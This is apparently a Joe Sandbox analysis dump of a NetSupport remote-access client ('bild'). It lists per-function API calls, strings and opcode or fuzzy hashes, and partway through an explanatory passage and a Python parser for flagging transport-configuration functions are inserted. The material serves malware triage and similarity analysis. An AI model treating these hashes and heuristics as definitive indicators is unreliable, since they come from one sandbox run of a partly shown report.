                                                                                      • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                      • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                      • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                      • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                      APIs
                                                                                        • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                        • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                        • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                      • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                      • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                      • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                      • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                      • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                      • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                      • String ID: AddToJournal$Chat
                                                                                      • API String ID: 693070851-2976406578
                                                                                      • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                      • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                      • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                      • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 1110534D
                                                                                      • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                      • GetTickCount.KERNEL32 ref: 1110535C
                                                                                      • GetTickCount.KERNEL32 ref: 1110538E
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                      • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                      • GetTickCount.KERNEL32 ref: 111053EC
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                      • API String ID: 831250470-625438208
                                                                                      • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                      • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                      • _memset.LIBCMT ref: 111373D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc$Version_memset
                                                                                      • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                      • API String ID: 1659045089-3162170060
                                                                                      • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                      • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                      • _memset.LIBCMT ref: 11039131
                                                                                      • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                      • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                      • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                      • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                      • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                      • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                        • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                        • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3085755443-3916222277
                                                                                      • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                      • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 1106F397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavewsprintf
                                                                                      • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                      • API String ID: 3005300677-3496508882
                                                                                      • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                      • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                      APIs
                                                                                      • IsWindow.USER32(?), ref: 11047211
                                                                                      • _malloc.LIBCMT ref: 110472AD
                                                                                      • _memmove.LIBCMT ref: 11047312
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,00030496,00000005,00000002,00002710,?), ref: 11047372
                                                                                      • _free.LIBCMT ref: 11047379
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                        • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                      • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                      • API String ID: 3960737985-1318765656
                                                                                      • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                      • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                      • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                      • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
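The entries above are a flat text dump of Joe Sandbox's per-function analysis: each function carries its API references (with "Part of subcall function" lines for APIs reached indirectly), a "$"-separated String ID, the memory-dump source, and an Opcode ID / Instruction ID pair that the report uses for cross-sample similarity. When triaging a NetSupport client, the functions worth pulling out first are the ones whose strings name the transport configuration (ListenPort, Port, TCPIP, UseNCS in the second entry above). The parser below is an added example, not code from Joe Sandbox or from the NetSupport product; it splits such a dump into one record per function and flags the transport-configuration functions. The sample input is copied from the entries on this page with some lines omitted, and the keyword set is an assumption of the example taken from that String ID, not from NetSupport documentation.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: entries copied from the report above, starting mid-entry as this
# page does, with some lines omitted. Raw string so the Windows path keeps its backslashes.
SAMPLE_REPORT = r"""
Similarity
• API ID: Item$Text$_strncpy$EnabledWindow_memset
• String ID:
• Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
APIs
• wsprintfA.USER32 ref: 1106F397
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeavewsprintf
• String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
• API String ID: 3005300677-3496508882
• Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
• Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
APIs
• IsWindow.USER32(?), ref: 11047211
• _malloc.LIBCMT ref: 110472AD
• SendMessageTimeoutA.USER32(?,0000004A,00030496,00000005,00000002,00002710,?), ref: 11047372
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Similarity
• API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
• String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
• Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
"""

SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<subcall>[0-9A-F]+):\s*)?"
    r"(?P<name>.+?)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")


@dataclass
class ApiRef:
    name: str
    module: str
    args: list[str]
    ref: str                    # call-site address in the dumped image
    subcall: str | None = None  # callee address when the API is reached via a sub-function


@dataclass
class FunctionRecord:
    apis: list[ApiRef] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)
    partial: bool = False  # fragment that began mid-entry (no "APIs" header seen)

    @property
    def opcode_id(self) -> str | None:
        return self.fields.get("Opcode ID")


def parse_report(text: str) -> list[FunctionRecord]:
    """Split a flat report dump into one record per function entry."""
    records: list[FunctionRecord] = []
    current, section = FunctionRecord(partial=True), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":  # "APIs" opens every entry, so it closes the previous one
            if current.apis or current.fields:
                records.append(current)
            current, section = FunctionRecord(), "APIs"
        elif line in SECTION_HEADERS:
            section = line
        elif section == "APIs":
            if m := API_RE.match(line):
                args = [a for a in (m["args"] or "").split(",") if a]
                current.apis.append(ApiRef(m["name"], m["module"], args, m["ref"], m["subcall"]))
        elif m := FIELD_RE.match(line):
            key, value = m["key"], m["value"].strip()
            if key == "String ID":  # "$" separates the strings the function references
                current.strings = [s for s in value.split("$") if s]
            else:
                current.fields[key] = value
    if current.apis or current.fields:
        records.append(current)
    return records


# Assumption of this example: string names that point at the client's transport
# configuration, taken from the String ID of the second entry above.
TRANSPORT_CONFIG_KEYS = frozenset({"ListenPort", "Port", "TCPIP", "UseNCS"})


def flag_transport_config(records: list[FunctionRecord], keys=TRANSPORT_CONFIG_KEYS):
    """(Opcode ID, matched names) for every function whose strings name transport config."""
    return [(r.opcode_id, sorted(set(r.strings) & keys)) for r in records if set(r.strings) & keys]


def index_by_opcode_id(records: list[FunctionRecord]) -> dict[str, FunctionRecord]:
    """Key records by Opcode ID so two reports' function sets can be intersected."""
    return {r.opcode_id: r for r in records if r.opcode_id}


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    print(f"{len(recs)} entries ({sum(r.partial for r in recs)} partial)")
    for opcode_id, names in flag_transport_config(recs):
        print(opcode_id, names)
```

On a full report the same parser runs over the whole function listing; the flagged record is the one to open first, since its strings ("%s:%d", "ListenPort", "NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s") sit in the function that formats the client's connection endpoint. Intersecting `index_by_opcode_id` outputs from two reports gives the shared-function set without touching the binaries.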
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                        • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                      • _memmove.LIBCMT ref: 1102D24A
                                                                                      • _memmove.LIBCMT ref: 1102D26E
                                                                                      • _memmove.LIBCMT ref: 1102D2A8
                                                                                      • _memmove.LIBCMT ref: 1102D2C4
                                                                                      • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                      • String ID: deque<T> too long
                                                                                      • API String ID: 827257264-309773918
                                                                                      • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                      • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                      • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                      • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                      • _memset.LIBCMT ref: 110051C0
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                      • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                      • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                      • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                      • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
